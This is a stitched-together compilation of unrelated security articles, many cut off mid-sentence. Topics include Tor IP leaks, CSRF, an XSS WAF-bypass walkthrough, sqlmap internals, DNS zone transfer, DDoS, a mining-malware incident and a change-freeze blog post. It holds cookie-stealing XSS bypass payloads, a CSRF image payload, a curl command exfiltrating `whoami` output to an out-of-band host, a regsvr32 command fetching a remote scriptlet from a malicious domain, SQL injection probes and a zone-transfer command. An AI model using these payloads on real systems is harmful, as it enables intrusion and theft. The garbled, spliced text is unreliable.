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安全研究人员发现,许多使用 SSL 证书的 Tor 站点可能会因配置错误暴露真实服务器的公共 IP 地址。研究人员指出,托管隐藏服务的服务器在配置正确的情况下仅监听本机地址(。但是如果让 Apache 服务器或 Nginx 服务器监听0.0.0.0,就意味着服务器可绕过 Tor 直接与外部建立连接,这样一来,这些配置错误的服务器的真实IP就容易被发现。

Tor (洋葱路由器)匿名网络是一个由位于世界各地的志愿者维护的各自的匿名网络组成的大型分布式匿名网络,类似于分布式的 VPN,但它是免费,开放的,而且其规模之大超乎想象。

Tor是一个世界范围的计算机网络,在请求开始点以加密方式转发请求,直到到达网络中最后一台称为出口节点(exit node)的计算机。出口节点会对请求进行解密并传输到目标服务器。出口节点是专门用于流量离开Tor网络的最后一跳,也是用于返回流量的第一跳。使用Tor时,与你通信的系统将所有传入的流量视为来自出口节点。他们不知道你的位置,也不知道你的真实IP地址。此外,Tor网络中其他系统也不能确定你的位置,因为实质上只是转发流量,并不知道流量的实际来源。请求的响应将返回系统,但对于Tor网络而言,流量源仅充当了路径中的一跳。本质上,你是匿名的。Tor用户可以避免将他们的IP地址暴露给他们访问的服务器。相反,这些服务器只能看到Tor的一个退出节点的IP地址。但是,TOR不仅会在访问Google.com或Facebook.com等网站时保护其用户,对于希望保持匿名的用户来说,Tor网络上的另一个选项是Tor隐藏服务。









任何试图从服务器的公共非Tor IP地址到达端口443的人都将看到CN中找到的证书和.onion域,该域位于给予ClientHello消息的ServerHello响应中。









根据Rosselyn Barroyeta最近的研究,即使使用最安全的服务,错误配置也会让你暴露。因此你要确保密切关注新的攻击形式。



CSRF(Cross-site request forgery),是中文:跨站请求伪造的缩写,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。




XSS:攻击者发现XSS漏洞――构造代码――发送给受害人――受害人打开――攻击者获取受害人的cookie――完成攻击 CSRF:攻击者发现CSRF漏洞――构造代码――发送给受害人――受害人打开――受害人执行代码――完成攻击





登录合法网站 合法网站通过验证,受害者储存合法网站的cookie 在不登出的情况下,访问受害者恶意构造的网站B 恶意网站发一个request请求访问A网站 受害者带着A的合法cookie访问了A并执行了恶意操作






<img src="http://www.a.com?money=-1000">





$_REQUEST既可以获取GET请求的数据,也可以获取POST请求的数据,这就造成 了在后台处理程序无法区分这到底是GET请求的数据还是POST请求的数据(也就是说你传POST也行传GET也行)


CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,而且请求中所有的用户验证信息都是存在于 cookie 中,所以黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。

如何防范? 在请求地址中加入token验证:当攻击者带着构造好的信息来的时候,通常不会知道我们构造的token是什么,我们可以通过验证token的真实性,如果为假就返回错误,如果为真就认为是正常用户访问。 在HTTP头中定义属性验证:我们通过XMLHttpRequest 这个类,可以一次性给所有该类请求加上 csrftoken 这个 HTTP 头属性,并把 token 值放入其中。 验证HTTP Referer:根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址,我们的合法地址为www.a.com?money=+1000,这样就可以正常访问,但如果前面的地址变为www.b.com就被识别出来了。

XSS WAF规则探测与绕过


*本文作者:Conan,本文属 CodeSec 原创奖励计划,未经许可禁止转载。


本文 以B站一个有趣的XSS(已修复)为引子(为什么说有趣后面再解释),作为实例分析其WAF的规则,方便大家加深对XSS WAF探测以及针对性bypass的理解。


一、一般waf是由多条正则配合使用,因而绕过也必须根据实际情况构造xss探针 '`";><aaa bbb=ccc>ddd<aaa/> 的方式逐步理清waf规则,对于没被wa的再在chrome浏览器的element和source看xss探针的解析,慢慢耐心尝试即可。

二、个人对于waf bypass的理解:本来应当被wa会生效的payload不在规则库里或用本来就不会生效的payload(这时候是大概率能通过waf的)经过服务器处理后payload最后生效了。


XSS WAF规则探测与绕过

2.上xss探针: ';`"><aaa bbb=ccc>ddd<aaa/>

XSS WAF规则探测与绕过

3. 上经典payload(这里由于可以控制标签,优先使用 <img><script> ):

对于 <img src=x onerror=alert(1)>

XSS WAF规则探测与绕过
对于 <script>alert(1)<script>
XSS WAF规则探测与绕过

4. 分析waf规则:基于从局部到整体的思想(这里是可以写成一个自动化的waf规则探测脚本的,xsstrike有简单的waf探测规则)


XSS WAF规则探测与绕过
于是可以率先得到一条waf规则: <script\s+[^>]*src=.* (注意实际的正则可能特别复杂,这里是简化版的,没有考虑一些特殊字符,比如字母和数字可能可以互换,还有一些特殊字符,空格等等,这里能大致描述清楚waf的正则表达式的主要结构就可以了,下面出现的正则表达式同理)。
XSS WAF规则探测与绕过


XSS WAF规则探测与绕过

(1) 局部探测

<img> 会wa么,没有wa:

XSS WAF规则探测与绕过


XSS WAF规则探测与绕过


XSS WAF规则探测与绕过
XSS WAF规则探测与绕过

(2) 尝试逐步组合

<img src=x> 会wa么,没有wa:

XSS WAF规则探测与绕过
<img src=x onerror=xxxx> 会wa么,没有wa:
XSS WAF规则探测与绕过
<img src=x onerror=alert(> 会wa么,没有wa:
XSS WAF规则探测与绕过

<img src=x onerror=alert(xxxx> 会wa么,终于wa了哈哈:

XSS WAF规则探测与绕过

(3) 回溯waf规则, <img src=x onerror=aaa(bbb> 会wa么,不wa:

XSS WAF规则探测与绕过
XSS WAF规则探测与绕过
均被wa了,单独提取出 onerror=alert(xxxx 呢,竟然不会:
XSS WAF规则探测与绕过
再试试 onerror=alert(xxxx) ,终于wa了:
XSS WAF规则探测与绕过
这里就要分析为什么 <img src=x onerror=alert(xxxx> 会wa,但 onerror=alert(xxxx 不会,只有补全了右括号才会的原因,我的猜测是前者触发了另一条waf规则(针对标签开头的waf规则 <[^>]*\s+on\w+=(?:prompt|alert|confirm){1}\(\w+ ,用 <..aaaa onbbbb=alert(ccc 成功触发waf(注意这里用\w的原因是比较懒,经过测试数字型on1111并不会被wa,描述清结构即可=。=)
XSS WAF规则探测与绕过
XSS WAF规则探测与绕过
而后者对应的waf规则直接是 on\w+=(?:prompt|alert|confirm){1}\(\w+\) 。


on\w+=(?:prompt|alert|confirm){1}\(\w+\) <[^>]*\s+on\w+=(?:prompt|alert|confirm){1}\(\w+


XSS WAF规则探测与绕过
但这里要求是弹框,对于函数的黑名单我们想到了可以用top对象绕过 top['alert'](1) 或者 top['al'+'ert'](1) 由于 [] 的存在不匹配字母数字或者下划线( \w )导致 <img src=x onerror=top['alert'](1)> 不匹配正则表达式也就不会被wa。
XSS WAF规则探测与绕过
XSS WAF规则探测与绕过

a. 使用script标签利用响应包会拼接双写payload绕过(基于特殊情景构造不在waf规则里的无效payload,经过组合后又生效了,也就是上文之前对于bypass的第二种理解)

利用 </script><script> + </script></script> 拼接闭合中间的 <script>标签 ,然后浏览器解析的时候为我们补上了最后的 </script>

payload向量结构: aaa</script>bbb<script>ccc

XSS WAF规则探测与绕过

可以看到最后aaa和ccc都是在 <script> 标签里了,并且aaa换成函数名+括号可以绕过了正则 <script>.*\(.*\) ,将a替换为 alert(document.cookie) ,将c替换为任意一个不被wa的变量或内置函数对象名即可 console.log

payload: alert(document.cookie)</script>bbb<script>console.log

XSS WAF规则探测与绕过
XSS WAF规则探测与绕过

b.7师傅的解法巧妙利用了前后双写拼接闭合中间的方式绕过 <script> 后的绝大部分正则检测,但对于正则的描述还不够具体, <script>aaa(bbb) 并不会被wa

XSS WAF规则探测与绕过
因此联想到 <script>alert(1)</script> 被wa还是因为函数的原因,所以正则应该是 <script>.*\s(?:alert|prompt|confirm)\(.*\) ,因此简单的做法还是直接利用top对象绕过即可,payloads: <script>top['alert'](1)</script>
XSS WAF规则探测与绕过

(5) 到这里发现了什么吗?



对比 <script>aaa(document.cookie) 和 <bbb>aaa(document.cookie)

XSS WAF规则探测与绕过
可以发现与 <script> 有关,经测试 <script>document.cookie 和 <script>doucment['cookie'] 均wa,再缩小,发现 <script>document[xxx] 和 <script>document.xxx 也wa了,但是 <script>documentxxx 不wa,于是乎可以判断又有两个waf规则很显然,即 <script>.*\s?document\.\w+ 和 <script>.*\s?document\[\w+\] 再对比 <script>aaa[](document.cookie) 与 <script>aaa[bbb](document.cookie)
XSS WAF规则探测与绕过
可以发现后者被wa了,此时想到用反引号代替括号,但反引号内的 document.cookie 并不会被解析为对象,确实绕过了规则但并没有实现弹cookie,
XSS WAF规则探测与绕过
到这里基本可以归纳补充加入反引号的规则的逃逸为 <script>[^`]*document\.\w+ 和 <script>[^`]*document\[\w+\]

缩小的过程的还发现 <script>\w+\.cookie 也会wa,到这里我就不想弹cookie了,打扰了。

尝试加载远程src,发现 <script\s(.*\s)?src(=\w+)?> 也wa了,到这里基本放弃对 <script> 后的规则的bypass了,打扰了。

b. <img src=x onerror=top['alert'](document.cookie)>


c. 尝试了下a标签,发现 <a href=javascript:xxx 就会被wa,但是 <a href=ccc> 和 <a yyy=javascript:xxx> 和

Container security orchestration with Falco and Splunk Phantom


Container security orchestration allows to define within your security policy how you are going to respond to your different container security incidents. These responses can be automated in what is called security playbooks. This way, you can define and orchestrate multiple workflows involving different software both for sourcing and responding. This is how Falco and Splunk Phantom can be integrated together to do this.

What is Splunk Phantom?

Phantom is a security orchestration platform, part of Splunk product portfolio. Phantom collects security events and reports from different sources, providing a unified security operations engine on top of them. With Phantom, you can automate tasks through security playbooks, orchestrate workflows and support a broad range of SOC (Security Operations Center) functions including events, case management, collaboration and reporting.

Imagine that to implement security on your Kubernetes cluster you have network perimeter security from your cloud provider, image scanning from a few different places because your use multiple registries, host OS software updates notifications and IDS container runtime security monitor like Falco. With Phantom, you can unify the events coming from these four sources and create your own “security control center” with aggregated reporting and unified incident response workflows.

#Container #security orchestration with @sysdig #Falco and @splunk #Phantom

Click to tweet

How integrate Falco and Phantom for container security orchestration?

Falco does an awesome job detecting anomalous runtime activity in your container fleet . For example: someone executing an interactive shell in a container; a container spawning suspicious process like a webshell, a rootkit or a cryptominer, an unexpected network connection, like a new outgoing connection from a database; or an application reading credentials files long after was started or writing files where it shouldn’t.

But Falco just emits security events, and you need to send those somewhere else for processing, alerting, maybe triggering some kind of incident response reaction and in the long term auditing, reporting and storage. Phantom is great at doing these, so publishing Falco events into Phantom made a lot of sense.Falco adds value to Phantom providing container and Kubernetes security insights. Phantom allows Falco to trigger incident response workflows for container security orchestration, store and report on the container security events .

In order to integrate Falco and Phantom together for container security orchestration, we will be using our Kubernetes response engine to publish Falco events into NATS message broker. Then a Function as a Service will be executed through Kubeless, which is subscribed to the message broker topics. This FaaS will format and forward our Falco container security events into Splunk Phantom:

Container security orchestration with Falco and Splunk Phantom

So let’s deploy this setup in our Kubernetes cluster. First, make sure kubectl is pointing to the desired Kubernetes cluster and then execute:

$ git clone https://github.com/draios/falco.git $ cd integrations/kubernetes-response-engine/deployment/cncf $ make

In case you don’t have Helm already running on your cluster, make sure you commit tiller’s RBAC configuration and then:

$ helm init --service-account tiller $ helm install --name sysdig-falco --set integrations.natsOutput.enabled=true stable/falco

After a couple of minutes (don’t worry if the pods restart a few times before entering Running state, there are some dependencies between them), you should have all the mentioned components up and running:

default sysdig-falco-frgp9 2/2 Running 1 33s default sysdig-falco-snjq7 2/2 Running 1 31s kubeless kubeless-controller-manager-d6db997c-c8gg9 1/1 Running 0 2m kubeless nats-trigger-controller-5c6659cb6f-4g2nq 1/1 Running 0 2m nats-io nats-1 1/1 Running 0 2m nats-io nats-2 1/1 Running 0 2m nats-io nats-3 1/1 Running 0 1m nats-io nats-operator-847684f6c7-mgmtt 1/1 Running 0 4m

Now that we have the Kubernetes response engine, we need to deploy Phantom. If you don’t have a Phantom commercial licence, you can get a free trial registering here . Once you register and log in, you will be able to download an OVA virtual machine image.

We need this VM instance to be reachable from your Kubernetes cluster. Different options here: you can run the image locally and then set up NAT forwarders or upload the VM to AWS a assign it a public IP address.

With both sides up and running, you can next deploy the Kubeless function that will forward events to Phantom.

Make sure you have pipenv and kubeless installed in your environment as described in Deploying Kubernetes Response Engine Components: NATS and Kubeless framework and then go to the Falco repository you cloned earlier:

$ cd falco/integrations/kubernetes-response-engine/playbooks/ $ ./deploy_playbook -p phantom -e PHANTOM_USER=$SOMEUSER -e PHANTOM_PASSWORD=$SOMEPASSWORD -e PHANTOM_BASE_URL=$PHANTOM_URL -t "falco.*.*"

PHANTOM_USER= and PHANTOM_PASSWORD= will be the credentials required to login into Phantom. PHANTOM_BASE_URL= will be the endpoint where Phantom is reachable.

Also you would have to add -e VERIFY_SSL=False if your Phantom instance doesn’t have a valid SSL certificate.

The function will take a couple of minutes to be ready, you can check it’s current state with:

$ kubeless function ls NAME NAMESPACE HANDLER RUNTIME DEPENDENCIES STATUS falco-phantom default phantom.handler python3.6 cachetools==2.1.0 1/1 READY

Once ready, Falco events will automatically show up in the Phantom interface:

Container security orchestration with Falco and Splunk Phantom

Let’s run a simple example, spawning a shell in one of our containers, something that Falco detects by default:

$ kubectl exec -it sysdig-falco-frgp9 bash Here we will immediately receive a new event Terminal shell in container together with all the metadata like specific pod and command that was used, visualized in a timeline. From here we can assign the issue to a support person, trigger a mail notif

IT和OT的协同防护已刻不容缓 3点入手



IT和OT的协同防护已刻不容缓 3点入手

首先,我们来了解下IT与OT。IT即信息技术,是用于管理和处理信息所采用的各种技术总称,主要是应用计算机科学和通信技术来设计、开发、安装和实施信息系统及应用软件。而OT (Operational Technology),则指操作技术,是工厂内的自动化控制系统操作专员为自动化控制系统提供支持,确保生产正常进行的专业技术。





1. 企业环境都不了解 没法防



2. IT和OT要协同防护




3. 网络分段不能少







0x00 前言


0x01 无法检测boolean注入






0x02 分析


通过上图,通过sqlmap显示的info,找到关键词 with --string= ,来到 sqlmap-masterlibcontrollerchecks.py ,再寻找if、while之类的看下代码的流程,来到 478行


从注释可以看到,这里是boolean型检测开始,下面还有其他的error-based、time-based、UNION query。明白自己所在的位置,大概分析的范围。


genCmpPayload 这个函数用于生成boolean类型payload,

kb.matchRatio 是原始页面和 id=原始值 + "),'.)(((, 报错页面的相似度。

kb.negativeLogic 是负逻辑,用一个负的随机数然后添加or的payload,where其他值可以在 sqlmap-masterxmlpayloadsboolean_blind.xml 看到具体含义。


接下来是 queryPage 函数,这个函数比较重要,它有一个修饰器,在 sqlmap-masterlibcoredecorators.py 中,threadData比较重要,它存储着上次请求的请求的各种数据,用来进行对比数据。在这个修饰的作用是为了当函数调用失败的时候,如果函数增加了往threadData.valueStack增加了数据,可以进行删除,从而恢复原来未调用函数之前的状态。下面是threadData存储的内容。


queryPage 还会根据参数值,返回不同的结果,比较关键的是 getRatioValue 参数,因为这个参数的bool值影响里面最为关键函数comparison返回值。

comparison 函数,也是根据getRatioValue参数,返回不同的结果,当getRatioValue为True的时候,返回与原始页面的相似度。


ratio > UPPER_RATIO_BOUND(0.98),返回True。
ratio < LOWER_RATIO_BOUND(0.02)为False。
(ratio - kb.matchRatio) > DIFF_TOLERANCE(0.05),允许%0.05的误差。

很多情况下payload会回显在页面上,sqlmap这里是把payload替换成 REFLECTED_VALUE ,然后对比的时候再把这些干扰因素去掉。

再通过threadData给falsePage, truePage返回包的各种参数(用于后面提取特征)。并通过 queryPage 获取相似度。进入到下一步判断。

这里有一个 kb.nullConnection ,通过checkNullConnection函数进行检测,


2、增加Header头Range: bytes=-1,通过len判断返回报body的长度是不是等于1。(这个测试了apache、nginx、Apache-Coyote/1.1都无效)



ratio = 1. * len(seqMatcher.a) / len(page)
if ratio > 1:
ratio = 1. / ratio





在标记注入前,如果 kb.heavilyDynamic (太多的变量了),还会进行一次使用ture payload判断是否如何规则。然后才把injectable置为true。

函数 getFilteredPageContent 通过正则 <script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|t|n|r 去掉所有的标签和script和css样式代码,通过对比正确的页面和错误页面收集的关键词,减去差集获取特征候选者。


这里主要是用于在判断了可能存在注入,提取一些特征,比如返回状态码、返回字符串。函数 extractTextTagContent 通过正则 <(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>([^<]+) 提取特定标签的text,然后获取正确页面text-错误页面text集合-错误页面的text,得到特征字符串。





checkSuhosinPatch(injection) ,检查了Suhosin path,因为Suhosin Get类型的,只获取value值前512字节,所以发送超过 512 字节的payload,看是否还存在注入,如果存在,就没有Suhosin path,


id=1' and 9703= (512空格) 9703 AND 'DyXn'='DyXn

checkFilteredChars(injection) ,检测大于号和圆括号是否过滤,如果利用下面payload请求返回包的相似度判断是否被过滤。

AND 2210>2209 AND 'mTvV'='mTvV
AND (2209)=2209 AND 'ZWWn'='ZWWn 总结


if re.match(r"A[w.,! ]+Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
injectable = True









36氪此前报道:《 提供企业安全服务?“漏洞银行”认为众测悬赏和综合诊断要两手抓 》

Q1、2018年 , 公司在技术、产品、市场、商业化、融资、团队等方面取得了哪些进展?




首先是重点关注由美国率先对中国发动的世界性贸易 战,贸易 战不仅对我们网络安全行业,对几乎所有行业都有非常剧烈的影响,我们会持续关注贸易战的走势情况,随时准备对发展战略进行调整。






Q4、2019年, 自己所在的行业、所在的细分方向大概率会出现的事情和趋势会有哪些?




国内的网络安全市场刚刚起步,纵观国内整体的安全市场,以后每一个细分领域都可能出现多家网络安全公司 。未来最重要的竞争力就是数据,谁掌握了大数据,谁就可以攀上安全行业竞争的制高点。





新科技创业系列主要针对新科技方向的公司,如AI、机器人、物联网、3D打印、区块链、智能制造、传感器、半导体、VR/AR/MR 、商业航天、新能源、新材料、有技术创新的硬件等。如果你对这个系列感兴趣,欢迎参与我们“新科技创业2018”系列的调研,调研问卷下载地址: https://shimo.im/docs/emmBf3aNrgU4cqn7/ ,问卷回复请发送至syq@36kr.com



DNS (Domain Name System, 域名系统 ),万维网上作为域名和 IP地址 相互映射的一个 分布式数据库 ,能够使用户更方便的访问 互联网 ,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。

基本概念 根域

就是所谓的“.”,其实我们的网址 www.baidu.com 在配置当中应该是 www.baidu.com. (最后有一点),一般我们在浏览器里输入时会省略后面的点,而这也已经成为了习惯。






Baidu.com就是一个顶级域名,而 www.baidu.com 却不是顶级域名,他是在baidu.com 这个域里的一叫做www的主机。


比如a. www.baidu.com ,在这个网址中, www.baidu.com 变成了一个二级域而不是一台主机,主机名是a。


能提供域名解析的服务器,上面的记录类型可以是A(address)记录,NS记录(name server),MX(mail),CNAME等。



A 记录也称为主机记录,是使用最广泛的DNS记录,A记录的基本作用就是说明一个域名对应的IP是多少, 它是域名和IP地址的对应关系,表现形式为 www.baidu.com , 这就是一个A记录!A记录除了进行域名IP对应以外,还有一个高级用法,可以作为低成本的负载均衡的解决方案,比如说, www.baidu.com 可以创建多个A记录,对应多台物理服务器的IP地址,可以实现基本的流量均衡!)。



NS 记录(Name Server)

NS 记录和SOA记录是任何一个DNS区域都不可或缺的两条记录,NS记录也叫名称服务器记录,用于说明这个区域有哪些DNS服务器负责解析,SOA记录说明负责解析的DNS服务器中哪一个是主服务器。因此,任何一个DNS区域都不可能缺少这两条记录。NS记录,说明了在这个区域里,有多少个服务器来承担解析的任务。

SOA 记录(Start ofAuthority)

NS 记录说明了有多台服务器在进行解析,但哪一个才是主服务器呢,NS并没有说明,这个就要看SOA记录了,SOA名叫起始授权机构记录,SOA记录说明了在众多NS记录里那一台才是主要的服务器。

MX 记录( Mail Exchanger )



别名记录。这种记录允许您将多个名字映射到另外一个域名。通常用于同时提供WWW和MAIL服务的计算机。例如,有一台计算机名为“host.mydomain.com”(A记录)。它同时提供WWW和MAIL服务,为了便于用户访问服务。可以为该计算机设置两个别名(CNAME):WWW和MAIL。这两个别名的全称就 http://www.mydomain.com/ 和“mail.mydomain.com ”。实际上他们都指向 “ host.mydomain.com ”。

SRV 记录

SRV 记录的作用是指明某域名下提供的服务。


_http._tcp.example.com. SRV 10 5 80. www.example.com

SRV 后面项目的含义:

10 优先级,类似 MX 记录 5 权重 80 端口

www.example.com 实际提供服务的主机名。

PTR 记录

PTR 记录也被称为指针记录, PTR 记录是 A 记录的逆向记录,作用是把 IP 地址解析为域名。由于我们在前面提到过, DNS 的反向区域负责从 IP 到域名的解析,因此如果要创建 PTR 记录,必须在反向区域中创建。

ip 反查域名: https://dns.aizhan.com/


1. 现在我有一台计算机,通过ISP接入了互联网,那么ISP就会给我分配一个DNS服务器,这个DNS服务器不是权威服务器,而是相当于一个代理的dns解析服务器,他会帮你迭代权威服务器返回的应答,然后把最终查到IP返回给你。

2. 现在的我计算机要向这台ISPDNS发起请求查询 www.baidu.com 这个域名了,(经网友提醒:这里其实准确来说不是ISPDNS,而应该是用户自己电脑网络设置里的DNS,并不一定是ISPDNS。比如也有可能你手工设置了8.8.8.8)

3. ISPDNS拿到请求后,先检查一下自己的缓存中有没有这个地址,有的话就直接返回。这个时候拿到的ip地址,会被标记为非权威服务器的应答。

4. 如果缓存中没有的话,ISPDNS会从配置文件里面读取13个根域名服务器的地址(这些地址是不变的,直接在BIND的配置文件中)。

5. 然后像其中一台发起请求。

6. 根服务器拿到这个请求后,知道他是com.这个顶级域名下的,所以就会返回com域中的NS记录,一般来说是13台主机名和IP。

7. 然后ISPDNS向其中一台再次发起请求,com域的服务器发现你这请求是baidu.com这个域的,我一查发现了这个域的NS,那我就返回给你,你再去查。(目前百度有5台baidu.com的顶级域名服务器)。

8. ISPDNS不厌其烦的再次向baidu.com这个域的权威服务器发起请求,baidu.com收到之后,查了下有www的这台主机,就把这个IP返回给你了。

9. 然后ISPDNS拿到了之后,将其返回给了客户端,并且把这个保存在高速缓存中。

工具使用 nslookup

笔者目前使用的kali虚拟机,下载连接: https://www.kali.org/downloads/


第一行Server是: DNS服务器的主机名

第二行Address是: 服务器的ip地址

非全未应答(Non-authoritative answer):

Name是:解析的URL www.lengbsikai.net



多出一个CNAME记录: www.a.shifen.com





第二步是向其中的一台根域服务器(Servername就是末行小括号里的ip:发送 www.baidu.com 的查询请求,他返回了com.顶级域的服务器IP(未显示)和名称。


第三步,便向com.域的一台服务器192.54.112.30#53请求 www.baidu.com ,他返回了baidu.com域的服务器IP(未显示)和名称,百度有五台顶级域的服务器

【此处可以用dig @ www.baidu.com 查看返回的百度顶级域名服务器IP地址】。



第四步,向百度的顶级服务器(请求 www.baidu.com ,他发现这个www有个别名,而不是一台主机,别名是 www.a.shifen.com 。


看到上面的情况,问题就来了,按照一般的逻辑,当dns请求到别名的时候,查询会终止,而是重新发起查询别名的请求,所以此处应该返回的只是 www.a.shifen.com 。但是为什么返回a.shifen.com的这个域的NS呢?




漏洞利用 DNS域传送(DNS Zone Transfer )

DNS 服务器分为: 主服务器、备份服务器和缓存服务器。域传送是指后备服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。 在主备服务器之间同步数据库,需要使用 “DNS 域传送 ” 。

由于DNS协议 运行在 UDP 协议 之上,使用端口号53,所以可以使用一些特殊的搜索引擎来快速获取目标。






fofa ( https://fofa.so )






本文的验证漏洞都是通过zZone-Transfe( https://github.com/Xyntax/zZone-Transfer )脚本给出的。

dig dig @ns.lining.cn axfr li-ning.com

@ 指定域名服务器; axfr 为域传送指令; xxx.edu.cn 表示要查询的域名;



区域传送是DNS常用的功能,区域传送的漏洞也不是没有办法解决的,严格限制允许区域传送的主机即可,例如一个主 DNS 服务器应该只允许它的从 DNS 服务器执行区域传送的功能。


















比如:curl http://ip.port.b182oj.ceye.io/`whoami`

这个时候需要根据实际情况对payload进行替换,ip 、port、 Identifier 。







分布式拒绝服务(DDoS:Distributed Denial of Service)攻击,是指攻击者利用大量“肉鸡”对攻击目标发动大量的正常或非正常请求、耗尽目标主机资源或网络资源,从而使被攻击的主机不能为正常用户提供服务。



DoS(拒绝服务,Denial of Service)就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。这是早期非常基本的网络攻击方式。






在信息安全的三要素―― 保密性完整性可用性 中,DoS针对的目标正是 可用性 。该攻击方式利用目标系统网络服务功能缺陷或者直接消耗其系统资源,使得该目标系统无法提供正常的服务。




无赖们扮作普通客户一直拥挤在商场,赖着不走,真正的购物者却无法进入;或者总是和营业员有一搭没一搭的东扯西扯,让工作人员不能正常服务客户;也可以为商铺的经营者提供虚假信息,商铺的上上下下忙成一团之后却发现都是一场空,最终跑了真正的大客户,损失惨重。一个无赖去胡闹,就是 DoS攻击,而一群无赖去胡闹,就是 DDoS攻击。


一般来说,DDoS 攻击可以具体分成两种形式:带宽消耗型以及资源消耗型。它们都是透过大量合法或伪造的请求占用大量网络以及器材资源,以达到瘫痪网络以及系统的目的。









为了对抗 DDoS攻击,你需要对攻击时发生了什么有一个清楚的理解。简单来讲,DDoS 攻击可以通过利用服务器上的漏洞,或者消耗服务器上的资源(例如 内存、硬盘等等)来达到目的。


1、如果可以识别出攻击源,如机器IP等,可以在防火墙服务器上放置一份 ACL(访问控制列表) 来阻断这些来自这些 IP 的访问。



4、优化资源使用提高 web server 的负载能力。例如,使用 apache 可以安装 apachebooster 插件,该插件与 varnish 和 nginx 集成,可以应对突增的流量和内存占用。

5、使用高可扩展性的 DNS 设备来保护针对 DNS 的 DDOS 攻击。可以考虑购买 Cloudfair 的商业解决方案,它可以提供针对 DNS 或 TCP/IP3 到7层的 DDOS 攻击保护。



8、监控网络和 web 的流量。时刻观察流量变化

9、保护好 DNS 避免 DNS 放大攻击。


对于网络攻击,没有任何办法彻底阻止和避免 ,只能尽最大努力不断提高黑客攻击成本。







































0x03 创建admin$账号












0x04 挖矿与远控木马

下载恶意程序,能过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll,如下所示:

















0x05 解决方案


2、切断传播途径:关闭潜在终端的SMB 445等网络共享端口,关闭异常的外联访问。




It’s The Change Freeze Season


It’s The Change Freeze Season

Everyone’s favorite time of the year is almost here! Is it because it’s the holiday season? Perhaps it’s the magic that happens at the end of the year? Or maybe, it’s because there’s an even better reason to get excited!

Change Freeze Season!

That’s right. Some of you reading this started jumping up and down like Buddy the Elf at the thought of having a change freeze. There’s something truly magical about laying down the law about not touching anything in the system until after the end-of-year reports are run and certified. For some, this means a total freeze of non-critical changes from the first of December all the way through the New Year until maybe even February. That’s a long time to have a frozen network? But why?

The Cold Shoulder

Change freezes are an easy thing to explain to the new admins. You simply don’t touch anything in the network during the freeze unless it’s broken. No tweaking. No experimenting. No improvements. Just critical break/fix changes only. There had better be a ticket. There should be someone yelling that something’s not right. Otherwise you’re in for it.

There are a ton of reasons for this. The first is something I remember from my VAR days as Boredom Repellent. When you find yourself at the end of year with nothing to do, you tend to get bored. After you’ve watched Die Hard for the fifteenth time this year you decide it’s time to clear out your project backlog. Or maybe you’ve been doing some learning modules instead. You find a great blog post from one of your favorite writers about a Great Awesome Amazing Feature That Will Save You Days Of Work If You Just Enable This One Simple Command!

In either case, the Boredom Repellent becomes like pheromones for problems. Those backlogged projects take more time than you expected. That simple feature you just need to enable isn’t so simple. It might even involve an entire code upgrade train to enable it. Pretty soon you find yourself buried in a CLI mess with people screaming about very real downtime. Now, instead of being bored you’re working until the wee hours of the night because of something you did.

The second reason for change freezes at the end of the year is management. You know, the people that call and scream at you as soon as their email appears to be running slow. The people that run reports once a month at 6:00pm and then call you because they get a funny warning message on their screen. Those folks. Guess what? End-of-year is their time to shine in all their glory.

This is usually the time they are under the most stress. Those reports have to be reprinted. All the financials from the year need to be consolidated and verified. The taxes will need to be paid. And all that paperwork and pressure adds up to stress. The kind of stress that makes any imperfections in the network seem ten times more important than before. Report screen not show success within 10 ms? Problem. Printer run out of yellow toner? Network problem. Laptop go to sleep while someone went to lunch and now the entire report is gone? Must be your problem. And guess who gets to work around the clock to solve it with someone bearing down on them from on high?

Don’t Let It Go

The fact is that we can’t have people doing things in the network without tracking those changes back to reasons. That applies for adventurous architects wanting to squeeze out the last ounce of performance from that amazing new switch. And it goes double for the CFO demanding you put his traffic into AF41 so it gets to the server faster so his reports don’t take six hours to print.

It all comes back to the simple fact that we have no way to track changes in our network and we have no way of knowing what will happen when we make one live. It feels an awful lot like this GIF:

It’s The Change Freeze Season

Crazy, right? Yet every time we hit the Enter key, we are amazed at the results. Even for “modern” OSes with sanity checking, like Junos or IOS-XR, you have no way of knowing if a change you make on one device somewhere in the branch is going to crash OSPF or BGP for the entire organization. And even if there was a big loud warning popup that said, “ALERT: YOU ARE GOING TO BREAK EVERYTHING!!!”, odds are good we would just click past it.

Network automation and orchestration systems can prevent this. They can take the control of change management out of the hands of bored engineers and wrap it in process and policy. And if the policy says Change Freeze then that’s what you get. No changes. Likewise, if there is a critical need, like patching out a backdoor or something, that policy can be overridden and noted so that if there is a bug eight months from now in that code train that causes issues you can have documentation of the reason for the change when someone comes to chew you out.

Likewise, there are other solutions out there that try to prototype the entire network to figure out what will happen when you make a change. Companies like Forward Networks and Veriflow can prototype your network in a model that can assess the impact of a change before you commit to it. It’s the dream of a bored engineer because you can run simulations to your heart’s content to find out if two hours of code upgrades will really get you that 2% performance increase promised in that blog post. And for the CFO/CEO/CIO screaming at you to prioritize their traffic, these solutions can remind them that most of their traffic is Youtube and Spotify and having that at AF41 will cause massive issues for them.

What’s important is that you and the rest of the team realize that change freezes aren’t a solution to the problem of an unstable network. Instead, they are treating the symptoms that crop up from the underlying disease of the network not being a deterministic system. Unlike some other machines, networks run just fine at sub-optimal performance levels. You can make massive mistakes that will live in a network for years and never show their ugly face. That is, until you make a small change that upsets equilibrium and causes the whole system to fail, cascade style, and leave you holding the keyboard as it were.

Tom’s Take

